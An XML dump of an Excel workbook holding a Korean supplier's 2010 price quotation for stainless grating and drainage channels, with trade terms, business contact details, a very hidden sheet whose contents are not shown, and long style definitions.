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683" activeTab="0"/>
  </bookViews>
  <sheets>
    <sheet name="견적서" sheetId="1" r:id="rId1"/>
    <sheet name="VXXXXXXX" sheetId="2" state="veryHidden" r:id="rId2"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm.Print_Area" localSheetId="0">'견적서'!$A$1:$H$37</definedName>
  </definedNames>
  <calcPr fullCalcOnLoad="1"/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="53" uniqueCount="52">
  <si>
    <t>Description</t>
  </si>
  <si>
    <t>(Quotation)</t>
  </si>
  <si>
    <t>품      명</t>
  </si>
  <si>
    <t xml:space="preserve">규     격 </t>
  </si>
  <si>
    <t>단 위</t>
  </si>
  <si>
    <t>수   량</t>
  </si>
  <si>
    <t>단     가</t>
  </si>
  <si>
    <t>금     액</t>
  </si>
  <si>
    <t>비   고</t>
  </si>
  <si>
    <t>Size</t>
  </si>
  <si>
    <t>Unit</t>
  </si>
  <si>
    <t>Quantity</t>
  </si>
  <si>
    <t>Unit price</t>
  </si>
  <si>
    <t>Amount</t>
  </si>
  <si>
    <t>Remark</t>
  </si>
  <si>
    <t xml:space="preserve"> 주) 거래조건 </t>
  </si>
  <si>
    <t xml:space="preserve">    4. 견적유효기간 : 견적서 발송일로부터 30일</t>
  </si>
  <si>
    <t xml:space="preserve"> </t>
  </si>
  <si>
    <t>견   적   서</t>
  </si>
  <si>
    <t>총계 :</t>
  </si>
  <si>
    <t xml:space="preserve">일   시 : </t>
  </si>
  <si>
    <t>수   신 :</t>
  </si>
  <si>
    <t>(\</t>
  </si>
  <si>
    <t xml:space="preserve">    2. 인도 조건 : 현장도착도</t>
  </si>
  <si>
    <t>견적서.xls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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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 xml:space="preserve">아래와 같이 </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="돋움"/>
        <family val="3"/>
      </rPr>
      <t>견적합니다.</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">    3. 결제 조건 : 현금</t>
  </si>
  <si>
    <t>경기도 평택시 비전동 520-3</t>
  </si>
  <si>
    <t>TEL.(031)658-3434, FAX.(031)618-3435</t>
  </si>
  <si>
    <t>jinsung3434@hanmail.net</t>
  </si>
  <si>
    <t>엔케이기업</t>
  </si>
  <si>
    <t>STS그레이팅(횡단측구용)</t>
  </si>
  <si>
    <t>150*1000*30</t>
  </si>
  <si>
    <t>m</t>
  </si>
  <si>
    <t>STS수로관(횡단측구용)</t>
  </si>
  <si>
    <t>178*1000*180</t>
  </si>
  <si>
    <t xml:space="preserve">    1. 부  가  세 : 별도</t>
  </si>
  <si>
    <r>
      <t>2010</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="돋움"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">년 </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="돋움"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve"> 07</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="돋움"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">월 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일</t>
    </r>
  </si>
  <si>
    <t>공사명 : STS그레이팅(횡단측구용) 납품단가</t>
  </si>
  <si>
    <t>대표: 남 상 경 (인)</t>
  </si>
</sst>
</file>

<file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <numFmts count="6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_ "/>
    <numFmt numFmtId="178" formatCode="0.00_);[Red]\(0.00\)"/>
    <numFmt numFmtId="179" formatCode="#,###,###,###&quot;)&quot;"/>
    <numFmt numFmtId="180" formatCode="#,##0&quot; &quot;;[Red]&quot;△&quot;#,##0&quot; &quot;"/>
    <numFmt numFmtId="181" formatCode="* #,##0&quot; &quot;;[Red]* &quot;△&quot;#,##0&quot; &quot;;* @"/>
    <numFmt numFmtId="182" formatCode="#,##0.####;[Red]&quot;△&quot;#,##0.####"/>
    <numFmt numFmtId="183" formatCode="#,##0.00##;[Red]&quot;△&quot;#,##0.00##"/>
    <numFmt numFmtId="184" formatCode="_ * #,##0_ ;_ * \-#,##0_ ;_ * &quot;-&quot;_ ;_ @_ "/>
    <numFmt numFmtId="185" formatCode="_ * #,##0.00_ ;_ * \-#,##0.00_ ;_ * &quot;-&quot;??_ ;_ @_ "/>
    <numFmt numFmtId="186" formatCode="&quot;₩&quot;#,##0.00;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;\-#,##0.00"/>
    <numFmt numFmtId="187" formatCode="&quot;$&quot;#,##0.00_);\(&quot;$&quot;#,##0.00\)"/>
    <numFmt numFmtId="188" formatCode="#,##0.00_ "/>
    <numFmt numFmtId="189" formatCode="0.00_ "/>
    <numFmt numFmtId="190" formatCode="_-&quot;₩&quot;* #,##0.00_-;&quot;₩&quot;&quot;₩&quot;\-&quot;₩&quot;* #,##0.00_-;_-&quot;₩&quot;* &quot;-&quot;??_-;_-@_-"/>
    <numFmt numFmtId="191" formatCode="_-* #,##0.00_-;&quot;₩&quot;&quot;₩&quot;\-* #,##0.00_-;_-* &quot;-&quot;??_-;_-@_-"/>
    <numFmt numFmtId="192" formatCode="&quot;₩&quot;#,##0;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;\-#,##0"/>
    <numFmt numFmtId="193" formatCode="&quot;₩&quot;#,##0;[Red]&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;\-#,##0"/>
    <numFmt numFmtId="194" formatCode="&quot;₩&quot;#,##0.00;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;\-#,##0.00"/>
    <numFmt numFmtId="195" formatCode="&quot;₩&quot;#,##0.00;[Red]&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;\-#,##0.00"/>
    <numFmt numFmtId="196" formatCode="_ &quot;₩&quot;* #,##0_ ;_ &quot;₩&quot;* &quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;\-#,##0_ ;_ &quot;₩&quot;* &quot;-&quot;_ ;_ @_ "/>
    <numFmt numFmtId="197" formatCode="#,##0;[Red]&quot;-&quot;#,##0"/>
    <numFmt numFmtId="198" formatCode="&quot;  &quot;@"/>
    <numFmt numFmtId="199" formatCode="\$#.00"/>
    <numFmt numFmtId="200" formatCode="m\o\n\th\ d\,\ yyyy"/>
    <numFmt numFmtId="201" formatCode="#.00"/>
    <numFmt numFmtId="202" formatCode="#."/>
    <numFmt numFmtId="203" formatCode="#,##0.000\ &quot;㎏ &quot;"/>
    <numFmt numFmtId="204" formatCode="#,##0.000\ &quot;m  &quot;"/>
    <numFmt numFmtId="205" formatCode="#,##0.000\ &quot;㎡ &quot;"/>
    <numFmt numFmtId="206" formatCode="#,##0.000\ &quot;㎥ &quot;"/>
    <numFmt numFmtId="207" formatCode="&quot;₩&quot;#,##0.00;&quot;₩&quot;&quot;₩&quot;\-#,##0.00"/>
    <numFmt numFmtId="208" formatCode="%#.00"/>
    <numFmt numFmtId="209" formatCode="#,##0.00;[Red]#,##0.00;&quot; &quot;"/>
    <numFmt numFmtId="210" formatCode="#,##0.0;[Red]#,##0.0;&quot; &quot;"/>
    <numFmt numFmtId="211" formatCode="yyyy&quot;年&quot;m&quot;月&quot;d&quot;日&quot;"/>
    <numFmt numFmtId="212" formatCode="_-* #,##0.0;\-* #,##0.0;_-* &quot;-&quot;.0;_-@"/>
    <numFmt numFmtId="213" formatCode="0.0000%"/>
    <numFmt numFmtId="214" formatCode="0.0%;[Red]\(0.0%\)"/>
    <numFmt numFmtId="215" formatCode="#,##0&quot; 원&quot;"/>
    <numFmt numFmtId="216" formatCode="#,##0.0000"/>
    <numFmt numFmtId="217" formatCode="#,##0.00000"/>
    <numFmt numFmtId="218" formatCode="&quot;직&quot;&quot;원&quot;\ ##\ &quot;인&quot;"/>
    <numFmt numFmtId="219" formatCode="_-* #,##0;\-* #,##0;_-* &quot;-&quot;;_-@"/>
    <numFmt numFmtId="220" formatCode="0.000000"/>
    <numFmt numFmtId="221" formatCode="\(&quot;₩&quot;#,##0\);[Red]\(\-&quot;₩&quot;#,##0\)"/>
    <numFmt numFmtId="222" formatCode="\(&quot;₩&quot;#,##0\);[Red]\(&quot;△&quot;&quot;₩&quot;#,##0\)"/>
    <numFmt numFmtId="223" formatCode="#,##0;&quot;-&quot;#,##0"/>
    <numFmt numFmtId="224" formatCode="&quot;₩&quot;\ \ #,##0\ &quot;원정&quot;;\-&quot;₩&quot;#,##0"/>
    <numFmt numFmtId="225" formatCode="&quot;$&quot;#,##0.00;\-&quot;$&quot;#,##0.00"/>
    <numFmt numFmtId="226" formatCode="@\ &quot;주임&quot;"/>
    <numFmt numFmtId="227" formatCode="000.000"/>
    <numFmt numFmtId="228" formatCode="?/?#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00">
    <font>
      <sz val="11"/>
      <name val="돋움"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="8"/>
      <name val="돋움"/>
      <family val="3"/>
    </font>
    <font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2"/>
      <name val="굴림"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="24"/>
      <name val="굴림"/>
      <family val="3"/>
    </font>
    <font>
      <b/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u val="single"/>
      <sz val="22"/>
      <name val="돋움"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="16"/>
      <name val="돋움"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="22"/>
      <name val="돋움"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="돋움"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="16"/>
      <name val="돋움"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="14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0"/>
      <name val="돋움체"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="돋움체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Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="MS Sans Serif"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="µ¸¿ò"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="바탕체"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="돋움체"/>
      <family val="3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sz val="11"/>
      <name val="바탕체"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="돋움체"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Courier New"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="굴림체"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="굴림체"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="견명조"/>
      <family val="1"/>
    </font>
    <font>
      <b/>
      <sz val="1"/>
      <color indexed="8"/>
      <name val="Courier"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="명조"/>
      <family val="3"/>
    </font>
    <font>
      <i/>
      <u val="single"/>
      <sz val="1"/>
      <color indexed="24"/>
      <name val="Courier"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="1"/>
      <color indexed="8"/>
      <name val="Courier"/>
      <family val="3"/>
    </font>
    <font>
      <u val="single"/>
      <sz val="12"/>
      <color indexed="36"/>
      <name val="바탕체"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="굴림체"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="뼻뮝"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="MS Sans Serif"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color indexed="10"/>
      <name val="돋움체"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="궁서체"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="18"/>
      <name val="궁서체"/>
      <family val="1"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color indexed="16"/>
      <name val="굴림체"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="명조"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="궁서(English)"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="10"/>
      <color indexed="12"/>
      <name val="굴림체"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="12"/>
      <color indexed="24"/>
      <name val="바탕체"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="¹UAAA¼"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="¹ÙÅÁÃ¼"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="8"/>
      <name val="¹UAAA¼"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="10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 val="single"/>
      <sz val="8.5"/>
      <color indexed="36"/>
      <name val="바탕체"/>
      <family val="1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u val="single"/>
      <sz val="8.5"/>
      <color indexed="12"/>
      <name val="바탕체"/>
      <family val="1"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <name val="굴림체"/>
      <family val="3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1"/>
      <color indexed="16"/>
      <name val="Courier"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="8"/>
      <name val="Helv"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <name val="MS Sans Serif"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="8"/>
      <color indexed="8"/>
      <name val="Helv"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <u val="single"/>
      <sz val="13"/>
      <name val="굴림체"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="8"/>
      <name val="바탕체"/>
      <family val="1"/>
    </font>
    <font>
      <b/>
      <sz val="8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굴림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1896"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>
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="3" fontId="45" fillId="0" borderId="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="24" fontId="41" fillId="0" borderId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8" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="184" fontId="49" fillId="0" borderId="1">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="3" fontId="45" fillId="0" borderId="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="3" fontId="45" fillId="0" borderId="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="184" fontId="50" fillId="0" borderId="2" applyBorder="0">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="209" fontId="50" fillId="0" borderId="0">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="210" fontId="14" fillId="0" borderId="0">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="210" fontId="14" fillId="0" borderId="0">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="3" fontId="51" fillId="0" borderId="3">
      <alignment horizontal="right" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="52" fillId="0" borderId="0">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="3" fontId="51" fillId="0" borderId="3">
      <alignment horizontal="right" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="210" fontId="14" fillId="0" borderId="0">
      <alignment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210" fontId="14" fillId="0" borderId="0">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="210" fontId="14" fillId="0" borderId="0">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="52" fillId="0" borderId="0">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="3" fontId="51" fillId="0" borderId="3">
      <alignment horizontal="right" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="52" fillId="0" borderId="0">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="53" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="52" fillId="0" borderId="0">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="52" fillId="0" borderId="0">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="53" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="210" fontId="14" fillId="0" borderId="0">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="210" fontId="14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41" fontId="46" fillId="0" borderId="0">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="41" fontId="46" fillId="0" borderId="0">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="41" fontId="46" fillId="0" borderId="0">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="41" fontId="46" fillId="0" borderId="0">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="176" fontId="54" fillId="0" borderId="0">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="41" fontId="46" fillId="0" borderId="0">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="41" fontId="46" fillId="0" borderId="0">
      <alignment horizontal="center"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210" fontId="14" fillId="0" borderId="0">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="3" fontId="51" fillId="0" borderId="3">
      <alignment horizontal="right" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="210" fontId="14" fillId="0" borderId="0">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="53" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="52" fillId="0" borderId="0">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="52" fillId="0" borderId="0">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="211" fontId="0" fillId="0" borderId="0">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="211" fontId="0" fillId="0" borderId="0">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="211" fontId="0" fillId="0" borderId="0">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="211" fontId="0" fillId="0" borderId="0">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="211" fontId="0" fillId="0" borderId="0">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="211" fontId="0" fillId="0" borderId="0">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="210" fontId="14" fillId="0" borderId="0">
      <alignment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3" fontId="51" fillId="0" borderId="3">
      <alignment horizontal="right" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="53" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="3" fontId="51" fillId="0" borderId="3">
      <alignment horizontal="right" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="210" fontId="14" fillId="0" borderId="0">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="3" fontId="51" fillId="0" borderId="3">
      <alignment horizontal="right" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="3" fontId="51" fillId="0" borderId="3">
      <alignment horizontal="right"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3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187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7" fontId="52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7" fontId="52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7" fontId="52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8" fontId="0" fillId="0" borderId="0">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="217" fontId="52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6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15" fontId="0" fillId="0" borderId="0">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="209" fontId="19" fillId="0" borderId="0">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="38" fontId="17" fillId="0" borderId="4">
      <alignment horizontal="right" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="40" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="224" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"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2" fontId="51" fillId="0" borderId="3">
      <alignment horizontal="right"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209" fontId="19" fillId="0" borderId="5">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="209" fontId="19" fillId="0" borderId="6">
      <alignment vertical="center"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9" fontId="46" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf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09" fontId="50" fillId="0" borderId="6">
      <alignment vertic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7" applyNumberFormat="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="192" fontId="46" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="55" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="55" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="56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 locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="3" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="58" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="3" fontId="41" fillId="0" borderId="8">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="9">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="58" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="59" fillId="0" borderId="0" applyNumberForma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84" fontId="47" fillId="0" borderId="10">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="21" borderId="11" applyNumberFormat="0" applyFont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1" fontId="19" fillId="0" borderId="1" applyNumberFormat="0" applyFont="0" applyFill="0" applyBorder="0" applyProtection="0">
      <alignment horizontal="distributed" vertical="center"/>
    </xf>
    <xf numFmtId="10" fontId="50" fillId="0" borderId="0">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="22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10" fontId="50" fillId="0" borderId="0">
      <alignment vertical="center"/>
      <protection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9" fontId="0" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="9" fontId="52" fillId="22" borderId="0" applyFill="0" applyBorder="0" applyProtection="0">
      <alignment horizontal="right"/>
    </xf>
    <xf numFmtId="10" fontId="52" fillId="0" borderId="0" applyFill="0" applyBorder="0" applyProtection="0">
      <alignment horizontal="right"/>
    </xf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61" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="23" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="228" fontId="62" fillId="0" borderId="12" applyFont="0" applyFill="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="28" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="184" fontId="63" fillId="0" borderId="13">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="226" fontId="0" fillId="0" borderId="14" applyBorder="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="221" fontId="0" fillId="0" borderId="0" applyNumberFormat="0" applyFont="0" applyFill="0" applyBorder="0" applyProtection="0">
      <alignment horizontal="centerContinuous" vertical="center"/>
    </xf>
    <xf numFmtId="38" fontId="49" fillId="0" borderId="0">
      <alignment vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="30" fillId="24" borderId="15" applyNumberFormat="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="3" fontId="64" fillId="0" borderId="0">
      <alignment vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="3" fontId="65" fillId="0" borderId="0">
      <alignment vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="219" fontId="50" fillId="0" borderId="0">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="184" fontId="17" fillId="0" borderId="13">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="197" fontId="6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184" fontId="46" fillId="0" borderId="16">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="67" fillId="0" borderId="17">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="0" borderId="18" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="198" fontId="44" fillId="0" borderId="1" applyBorder="0">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="0" borderId="19" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="223" fontId="68" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="227" fontId="0" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="223" fontId="68" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="223" fontId="68" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="69" fillId="0" borderId="0">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="49" fillId="0" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0">
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="7" borderId="7" applyNumberFormat="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="4" fontId="58" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="56" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="4" fontId="70" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="193" fontId="46" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf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6" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="20" borderId="23" applyNumberFormat="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="224" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="22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41" fontId="0" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="188" fontId="52" fillId="22" borderId="0" applyFill="0" applyBorder="0" applyProtection="0">
      <alignment horizontal="right"/>
    </xf>
    <xf numFmtId="38" fontId="19" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="18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9" fontId="20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6" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="224" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="22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44" fontId="0" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="224" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="42" fontId="0" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="191" fontId="46" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="224" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="22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0" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="40" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="0">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
